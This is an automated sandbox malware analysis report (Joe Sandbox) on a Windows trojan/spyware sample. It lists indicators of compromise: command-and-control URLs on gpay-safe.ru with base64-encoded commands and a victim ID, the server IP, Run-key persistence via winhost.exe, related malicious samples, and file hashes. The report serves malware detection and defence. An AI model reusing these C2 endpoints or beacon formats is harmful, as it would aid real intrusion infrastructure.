                  http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQx0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://gpay-safe.ru0%Avira URL Cloudsafe
                  http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ0%Avira URL Cloudsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.apache.o0%Avira URL Cloudsafe
                  http://www.sakkal.com0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  gpay-safe.ru
                  		91.206.93.216
                  		truetrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://gpay-safe.ru/x/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.04054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designersG4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers/?4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bThe4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.tiro.com84054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.647017703.000000001BECF000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQx4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designers?4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                            		high
                            http://www.tiro.comwinhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designerswinhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                              		high
                              http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQxwinhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.goodfont.co.kr4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersP4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651132557.000000001BED7000.00000004.00000001.sdmpfalse
                                		high
                                http://en.w4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.645343119.000000001BE94000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.coml4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.com4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netD4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.ascendercorp.com/typedesigners.htmlx4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.649141258.000000001BE94000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlN4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cThe4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htm4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.com4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/frere-user.html4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651567513.000000001BED7000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                    		high
                                    http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQxwinhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.html4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651883264.000000001BED7000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPlease4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers84054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fonts.com4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.kr4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://gpay-safe.ru4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679709753.0000000002F6C000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.699597146.0000000002EA1000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.urwpp.deDPlease4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cn4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.apache.o4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.646554695.000000001BECF000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sakkal.com4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          1.1.1.1
                                          		unknownAustralia
                                          		13335CLOUDFLARENETUStrue
                                          91.206.93.216
                                          		gpay-safe.ruRussian Federation
                                          		49392ASBAXETNRUtrue

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:471063
                                          Start date:25.08.2021
                                          Start time:00:48:16
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 9s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:34
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@32/11@5/3
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 5.2% (good quality ratio 3.2%)
                                          • Quality average: 48.9%
                                          • Quality standard deviation: 42.5%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 179
                                          • Number of non-executed functions: 1
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.50.102.62, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.210.154
                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          00:49:12API Interceptor2x Sleep call for process: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe modified
                                          00:49:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          00:49:17API Interceptor3x Sleep call for process: winhost.exe modified
                                          00:49:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run a5b002eacf54590ec8401ff6d3f920ee C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          1.1.1.1INVOICE_90990_PDF.exeGet hashmaliciousBrowse
                                          • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                                          Go.exeGet hashmaliciousBrowse
                                          • 1.1.1.1/
                                          QQ9.0.1.exeGet hashmaliciousBrowse
                                          • url-quality-stat.xf.qq.com/Analyze/Data?v=1&&format=json&&qq=0&&cmd=21&&product=qqdownload

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          gpay-safe.rumixinte_20210821-092359(1).exeGet hashmaliciousBrowse
                                          • 91.206.93.216

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          CLOUDFLARENETUSTi0Llyz763.exeGet hashmaliciousBrowse
                                          • 104.21.70.98
                                          VibR4H3H85.exeGet hashmaliciousBrowse
                                          • 104.26.13.31
                                          OBL PN210700369.pdf.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          I7nOSnzON0.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          DUE SOA.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          ATT65197.htmGet hashmaliciousBrowse
                                          • 104.16.19.94
                                          ATT58761.htmlGet hashmaliciousBrowse
                                          • 104.16.19.94
                                          tiS0LFl5Cd.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          ATT43313.htmlGet hashmaliciousBrowse
                                          • 104.16.18.94
                                          n038rUglDh.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          VXS0UU2rgK.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          Fax-Rec'd - EFT Remittance - Doc -Tuesday, August 24, 2021-5560.htmGet hashmaliciousBrowse
                                          • 104.16.19.94
                                          Billing & Check#001021.htmlGet hashmaliciousBrowse
                                          • 104.16.18.94
                                          EPQKBK4yHX.exeGet hashmaliciousBrowse
                                          • 172.67.179.123
                                          9eRCbmFknk.exeGet hashmaliciousBrowse
                                          • 104.23.99.190
                                          SafeCrypt-Portable-win64-1.3.0.80.exeGet hashmaliciousBrowse
                                          • 1.3.0.80
                                          mQri1JxNdQ.exeGet hashmaliciousBrowse
                                          • 104.17.29.11
                                          kumv6tI8h6.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          nE0BePfCtd.exeGet hashmaliciousBrowse
                                          • 172.67.216.236
                                          4fPLarwmk4.exeGet hashmaliciousBrowse
                                          • 104.26.13.31
                                          ASBAXETNRUj349f5iJEdGet hashmaliciousBrowse
                                          • 2.56.240.65
                                          DUsM8INDiD.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          cfcb21c8c129c8c2c525ecfac8bd883260eda6038e399.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          MeQcP3Csz5Get hashmaliciousBrowse
                                          • 195.133.192.48
                                          0QhtHx4znuGet hashmaliciousBrowse
                                          • 195.133.192.48
                                          mixinte_20210821-092359(1).exeGet hashmaliciousBrowse
                                          • 91.206.93.216
                                          dark.arm7Get hashmaliciousBrowse
                                          • 212.196.181.159
                                          94VG.armGet hashmaliciousBrowse
                                          • 212.193.8.17
                                          sora.arm7Get hashmaliciousBrowse
                                          • 212.196.181.183
                                          TFb80WLdbo.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          mcQMknyBg0.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          am2zWv3TtG.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          bDCLrONExt.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          y1FOl1vVPA.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          31K61e3kyI.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          EMI3KjRHWs.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          4VVvnNObjp.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          TFmQ9XI1Pa.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          uX24M5IH33.exeGet hashmaliciousBrowse
                                          • 185.191.34.170
                                          uGnsgIUjBz.exeGet hashmaliciousBrowse
                                          • 185.191.34.170

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.log
                                          Process:C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):1046
                                          Entropy (8bit):5.260701310698336
                                          Encrypted:false
                                          SSDEEP:12:Q3LaJcP0/9UkB9t0kaHYGLi1B01kKVdisk70OAEaAN0hK9C4XXhK9yi0z6+xai0r:ML2pBLaYgioQxAfAiK/XhKoRL+r
                                          MD5:E374C1DD777BBD7BD346BC6677EF6864
                                          SHA1:5D6CD3DC97DA1FC6EA2BDD0E3DF84BB4CDE305F8
                                          SHA-256:150A0F0A59A04F7023A5F7E8C1739949B1CD40D15550FDBC58F7616AF24E2A30
                                          SHA-512:AB0F378628DCE34C1341583749E879EBA40FCD525977A642D0623E53DD174EDB53D061C29AE585244537BDFB6E469A590D954FE291F83154829B1937FD273670
                                          Malicious:true
